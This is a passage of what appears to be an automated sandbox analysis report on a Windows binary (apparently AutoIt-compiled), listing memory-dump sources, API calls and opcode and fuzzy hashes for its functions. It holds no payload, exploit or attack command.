                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1378193009-0
                                                                                                          • Opcode ID: b75b43f83d13a5bab425e2fcc42f046ba70d0dcfb4f08ee3ed4cd5b59a96166a
                                                                                                          • Instruction ID: 16d374c014abd0a50427f46f3f5b986d3d49099be282e4348211bafa9a65cd14
                                                                                                          • Opcode Fuzzy Hash: b75b43f83d13a5bab425e2fcc42f046ba70d0dcfb4f08ee3ed4cd5b59a96166a
                                                                                                          • Instruction Fuzzy Hash: A3212F715057849FEBB29764DC99FEABBFCAF01308F44148DE69976181C3742988CB41
APIs
  • Part of subcall function 00E549C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E527AF,?,00000001), ref: 00E549F4
• _free.LIBCMT ref: 00E8FB04
• _free.LIBCMT ref: 00E8FB4B
  • Part of subcall function 00E529BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E52ADF
Strings
• Bad directive syntax error, xrefs: 00E8FB33
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
• String ID: Bad directive syntax error
• API String ID: 2861923089-2118420937
• Opcode ID: 7dd79b1ff9bc94b1ca56c600e4b9fc309a243d8d9a0d4bcc6111758ced3db72e
• Instruction ID: a47a009ec308c81ba37d12aac3c3169c27ce6fdfd80648875f3ae3f1f073fb1d
• Opcode Fuzzy Hash: 7dd79b1ff9bc94b1ca56c600e4b9fc309a243d8d9a0d4bcc6111758ced3db72e
• Instruction Fuzzy Hash: 6D916E71910219AFCF08EFA4C8519EEB7B4FF49314F14656AF81ABB291EB30A945CB50
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: _memmove
• String ID: AU3! ?$EA06
• API String ID: 4104443479-1349402219
• Opcode ID: e35b3a28ddb3a7c96af64901ce65ff5f34efb3b98b01ea9beec18cfd035b65c9
• Instruction ID: 02715d47eb5689c02c618365b22721b46e426ffcf1b9f77845bc455f84390a5a
• Opcode Fuzzy Hash: e35b3a28ddb3a7c96af64901ce65ff5f34efb3b98b01ea9beec18cfd035b65c9
• Instruction Fuzzy Hash: 01418CA1A041585BDF269B5488527FF7BE18B85309F586875EC82FB2C7D5208DC883E1
APIs
  • Part of subcall function 00E54AB2: __fread_nolock.LIBCMT ref: 00E54AD0
• _wcscmp.LIBCMT ref: 00EA9DE1
• _wcscmp.LIBCMT ref: 00EA9DF4
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: 9eee5c9a4f1241b8dfab42bc6b298e2003c3d5374345ba4491838439295c644f
• Instruction ID: 81c6f417edf09a0a4905c23fb940ab5d1e8c1cd48c5bcdeb63b5529d76e46992
• Opcode Fuzzy Hash: 9eee5c9a4f1241b8dfab42bc6b298e2003c3d5374345ba4491838439295c644f
• Instruction Fuzzy Hash: B141D872A40209BADF21DAA4CC45FEF7BFDDF4A714F00446AFA00BB182E671A9448765
APIs
• _memset.LIBCMT ref: 00E9032B
• GetOpenFileNameW.COMDLG32(?), ref: 00E90375
  • Part of subcall function 00E60284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E52A58,?,00008000), ref: 00E602A4
  • Part of subcall function 00E609C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E609E4
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X
• API String ID: 3777226403-3081909835
• Opcode ID: db8bc42fece6ac68d99eec34ee16e12db14e18c840136872fcc3db1e331b3ade
• Instruction ID: 864536f09651e9a2342fdc5e334e5fd5ba1665372f9fba8eaff9909594a1a210
• Opcode Fuzzy Hash: db8bc42fece6ac68d99eec34ee16e12db14e18c840136872fcc3db1e331b3ade
• Instruction Fuzzy Hash: 4A21A171A002989BCF41DFA4D805BEE7BF8AF49305F00545AE908BB241DBB45A8C9FA1
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0031967376a1f3bbf9a1aee60d39145085e81192b43904aaa3ea38d4031e6405
• Instruction ID: 082fce8693bb3ed8ff969116ff4ec2ce54922ff1ba018319f95d4ef18805bb60
• Opcode Fuzzy Hash: 0031967376a1f3bbf9a1aee60d39145085e81192b43904aaa3ea38d4031e6405
• Instruction Fuzzy Hash: ACF12A706083419FC714DF28C984AAABBE5FF88318F14992DF899AB351D771E945CF82
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 3b4a543cb78d4f81de040c1616c35665299e4eb9c02acaba2cc3a57ced66ab9c
• Instruction ID: 8218a932c1f622e267f21de2c4b4086a79aaecf4e030d5851232d96c7cd214f2
• Opcode Fuzzy Hash: 3b4a543cb78d4f81de040c1616c35665299e4eb9c02acaba2cc3a57ced66ab9c
• Instruction Fuzzy Hash: 5561E071600209EBDF04CF29D9807AA7BB4FF44351F1895AAEC59EF294EB31D964CB50
APIs
  • Part of subcall function 00E5FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00EC4186,00000001,00ED0980), ref: 00E5FFA7
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E4AD08
• OleInitialize.OLE32(00000000), ref: 00E4AD85
• CloseHandle.KERNEL32(00000000), ref: 00E82F56
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 3815369404-0
• Opcode ID: 6ca0100fc001dbcec7224c7e0d0f3b57e2bac7f24ff5d601d71bd1a44e676cb1
• Instruction ID: 8b3fe4acaca427c086bd516ac521e15094435d5986ef24d227856e104ac0d30b
• Opcode Fuzzy Hash: 6ca0100fc001dbcec7224c7e0d0f3b57e2bac7f24ff5d601d71bd1a44e676cb1
• Instruction Fuzzy Hash: 944112B4E09388CEC759FF29AD446697BE4FB5831070495EAE418E32B2EA303405FB61
APIs
• _memset.LIBCMT ref: 00E559F9
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E55A9E
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E55ABB
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: IconNotifyShell_$_memset
• String ID:
• API String ID: 1505330794-0
• Opcode ID: 832967ebaa33b998d62bc9a5698c8e977398d39fbf6deaa5eff0c2ddbe0709cb
• Instruction ID: 607634ca511aaaa5c6008874fa833739feef8df571b2751d9db3207536985e08
• Opcode Fuzzy Hash: 832967ebaa33b998d62bc9a5698c8e977398d39fbf6deaa5eff0c2ddbe0709cb
• Instruction Fuzzy Hash: 5431D2B19057058FC720EF34D894697BBF8FB48309F000E2EF99AA3241E771A948CB52
APIs
• __FF_MSGBANNER.LIBCMT ref: 00E65953
  • Part of subcall function 00E6A39B: __NMSG_WRITE.LIBCMT ref: 00E6A3C2
  • Part of subcall function 00E6A39B: __NMSG_WRITE.LIBCMT ref: 00E6A3CC
• __NMSG_WRITE.LIBCMT ref: 00E6595A
  • Part of subcall function 00E6A3F8: GetModuleFileNameW.KERNEL32(00000000,00F053BA,00000104,00000004,00000001,00E61003), ref: 00E6A48A
  • Part of subcall function 00E6A3F8: ___crtMessageBoxW.LIBCMT ref: 00E6A538
  • Part of subcall function 00E632CF: ___crtCorExitProcess.LIBCMT ref: 00E632D5
  • Part of subcall function 00E632CF: ExitProcess.KERNEL32 ref: 00E632DE
  • Part of subcall function 00E68D58: __getptd_noexit.LIBCMT ref: 00E68D58
• RtlAllocateHeap.NTDLL(010B0000,00000000,00000001,?,00000004,?,?,00E61003,?), ref: 00E6597F
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
• Opcode ID: 4751550fc07b152f03636c5c8fedf04cb65e909b2ba7f2cf27726dff45b8c17d
• Instruction ID: 0f49ae3795fe3041eacb9f265ec4cc008f46f9494ded3f737baab833423c51b1
• Opcode Fuzzy Hash: 4751550fc07b152f03636c5c8fedf04cb65e909b2ba7f2cf27726dff45b8c17d
• Instruction Fuzzy Hash: 440192323C1B06DAE6153735BC42A6F33989F927F4F50212BF525BB292DEB08D004B61
                                                                                                          APIs
                                                                                                          • _free.LIBCMT ref: 00EA92D6
                                                                                                            • Part of subcall function 00E62F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00E69C54,00000000,00E68D5D,00E659C3), ref: 00E62F99
                                                                                                            • Part of subcall function 00E62F85: GetLastError.KERNEL32(00000000,?,00E69C54,00000000,00E68D5D,00E659C3), ref: 00E62FAB
                                                                                                          • _free.LIBCMT ref: 00EA92E7
                                                                                                          • _free.LIBCMT ref: 00EA92F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 776569668-0
                                                                                                          • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                                          • Instruction ID: 98b9e9ab3c7175423ba89cb85c2ce35559684618b54517107e37b751c5524380
                                                                                                          • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                                          • Instruction Fuzzy Hash: C5E012A1705A1257CA24A5787940F9377FC4FCD7A5715251DB50AFB143CE28F8418178
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: CALL
                                                                                                          • API String ID: 0-4196123274
                                                                                                          • Opcode ID: b68a89971d7be0129e86a002dfb608cd19aae72d059263361d4260c89bbccc2d
                                                                                                          • Instruction ID: 9364d431c2d12f1d00a993063a8dc1e4e08258ffe7e56ac861b3ba07caebc6f6
                                                                                                          • Opcode Fuzzy Hash: b68a89971d7be0129e86a002dfb608cd19aae72d059263361d4260c89bbccc2d
                                                                                                          • Instruction Fuzzy Hash: 81326A74608341DFCB24DF14D480A6AB7E1BF89304F14A96DF88AAB362D731EC45DB82
                                                                                                          APIs
                                                                                                          • _strcat.LIBCMT ref: 00EBE20C
                                                                                                            • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
                                                                                                            • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
                                                                                                          • _wcscpy.LIBCMT ref: 00EBE29B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __itow__swprintf_strcat_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1012013722-0
                                                                                                          • Opcode ID: d2b78a631f338025286266bc46069ae9d8977239a730ff0432fde005f2b98186
                                                                                                          • Instruction ID: 8cf97ca20d2ff530159df51fe63de1d4cb3fa01ad09da8dc2884bcdc386bd6e0
                                                                                                          • Opcode Fuzzy Hash: d2b78a631f338025286266bc46069ae9d8977239a730ff0432fde005f2b98186
                                                                                                          • Instruction Fuzzy Hash: 7D912735A00604DFCB18DF28D5819EEB7F5EF59314B55A05AE81AAF3A2DB30ED01CB81
                                                                                                          APIs
                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00EA614E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharLower
                                                                                                          • String ID:
                                                                                                          • API String ID: 2358735015-0
                                                                                                          • Opcode ID: 12d9df646d8961f903e5bbcd8acc1750f117318e5ae72e7e79f69cca4185c7e0
                                                                                                          • Instruction ID: 1ddfea415faf8c3d19b6936b91c474df6e858837264559b862eab8508f4c34b5
                                                                                                          • Opcode Fuzzy Hash: 12d9df646d8961f903e5bbcd8acc1750f117318e5ae72e7e79f69cca4185c7e0
                                                                                                          • Instruction Fuzzy Hash: 5B411C76600209AFCB11DF64C8819AE77F8FF5A354B14552EE916EF251EB30EE04CB60
                                                                                                          APIs
                                                                                                          • IsThemeActive.UXTHEME ref: 00E55FEF
                                                                                                            • Part of subcall function 00E6359C: __lock.LIBCMT ref: 00E635A2
                                                                                                            • Part of subcall function 00E6359C: DecodePointer.KERNEL32(00000001,?,00E56004,00E98892), ref: 00E635AE
                                                                                                            • Part of subcall function 00E6359C: EncodePointer.KERNEL32(?,?,00E56004,00E98892), ref: 00E635B9
                                                                                                            • Part of subcall function 00E55F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E55F18
                                                                                                            • Part of subcall function 00E55F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E55F2D
                                                                                                            • Part of subcall function 00E55240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E5526C
                                                                                                            • Part of subcall function 00E55240: IsDebuggerPresent.KERNEL32 ref: 00E5527E
                                                                                                            • Part of subcall function 00E55240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00E552E6
                                                                                                            • Part of subcall function 00E55240: SetCurrentDirectoryW.KERNEL32(?), ref: 00E55366
                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00E5602F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1438897964-0
                                                                                                          • Opcode ID: 96f59e5ace55f5307a0442becccd12dd67c13371071c3a2c050b35ef172c5ab8
                                                                                                          • Instruction ID: a9ee02d150dcb7af5fbff3430fe3f417eabb4f761b6dc75c6aba0c1d1ab6c276
                                                                                                          • Opcode Fuzzy Hash: 96f59e5ace55f5307a0442becccd12dd67c13371071c3a2c050b35ef172c5ab8
                                                                                                          • Instruction Fuzzy Hash: 4211AC719083059BC320EF69EC45A4ABBE8FF99350F40491AF484A72B1DB70A548CF92
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00E53E72,?,?,?,00000000), ref: 00E54327
                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00E53E72,?,?,?,00000000), ref: 00E90717
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 1237c21336d4c0171e6fd2754dcd0bc4c5fba621ab5be5d924c8a7bf577310da
                                                                                                          • Instruction ID: 46887759918fdec3d9e64bcea4cfa4cb22d8143953733f0316c18083d0aad99b
                                                                                                          • Opcode Fuzzy Hash: 1237c21336d4c0171e6fd2754dcd0bc4c5fba621ab5be5d924c8a7bf577310da
                                                                                                          • Instruction Fuzzy Hash: D00180B0245209BEF7641E248C8AFA67A9CEB0176DF50C619BEE47A1E0C6B15C89CB14
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __lock_file_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 26237723-0
                                                                                                          • Opcode ID: ed4880d234f1724d1d559a27eb3eca096c4716b7ce430aae14da8508f8017995
                                                                                                          • Instruction ID: 22e3a657a06d5a3ad3e1f1ea3326a1f9b3ef40a3eef21c5ddf1d5037a321e82e
                                                                                                          • Opcode Fuzzy Hash: ed4880d234f1724d1d559a27eb3eca096c4716b7ce430aae14da8508f8017995
                                                                                                          • Instruction Fuzzy Hash: DE018472980748EBCF11AF69FD0589E7BA1AF903E0F145226B9243B1A1D7318A21DF91
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E68D58: __getptd_noexit.LIBCMT ref: 00E68D58
                                                                                                          • __lock_file.LIBCMT ref: 00E6560B
                                                                                                            • Part of subcall function 00E66E3E: __lock.LIBCMT ref: 00E66E61
                                                                                                          • __fclose_nolock.LIBCMT ref: 00E65616
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 2800547568-0
                                                                                                          • Opcode ID: 724c1307a424aa64d7ec785b38004344e942ca495f8938faddac9eaa56cbd202
                                                                                                          • Instruction ID: 444c61280194598f69d7617f16592679c7b517e3e533ed89675316a2f84060c6
